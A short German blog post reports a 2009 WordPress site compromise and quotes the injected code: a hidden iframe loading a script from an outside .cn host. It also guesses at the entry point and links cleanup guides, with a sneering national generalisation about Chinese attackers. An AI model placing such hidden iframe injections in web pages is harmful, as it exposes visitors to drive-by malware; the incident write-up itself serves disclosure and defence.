Der Weblog www.yago1.com wurde gehackt. Es wurden verschiedene Dateien mit folgendem Code modifiziert.
< iframe src=”http:// namebuyfilmlife . cn : 8080/ts/in.cgi?pepsi20″ width=12 height=12 style=”visibility: hidden” >< /iframe >
Ich gehe davon aus das es ein Automatisch hack war – also ein Roboter / Spider welcher ein Sicherheitsloch Augenutzt hat. Die Domain Endung CN lässt Vermutunggen aufkommen, dass es sich erneut um einen “Angreifer” aus dem Reich der Mitte handelt… Nach einer kurzen Analyse der error_log Dateien auf dem Server gehe ich davon aus das dieser Angriff vor dem [22-May-2009 06:46:34] direkt über die MySQL WordPress Datenbank. Ich werde die gleich mit dem Support meines Webhostings Abklären.
Ironisch an der ganzen Geschichte, finde ich die Tatsache das im letzten grossen kommunistischen Experiment, es Individuen gibt welche über solche Aktionen wohl ernsthaft versuchen den Umsatz ihres Webshops – namebuyfilmlife.cn – zu erhöhen…
Ein paar weiterführende Informationen für Betroffene.
My site’s been hacked – now what? – Google Webmaster Central
http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html
Tips for Cleaning & Securing your Website – StopBadware.org
http://www.stopbadware.org/home/security
Online WordPress scan (muss zuerst das WP Plugin installieren – Secure WordPress von Frank Bültge)
http://blogsecurity.net/wpscan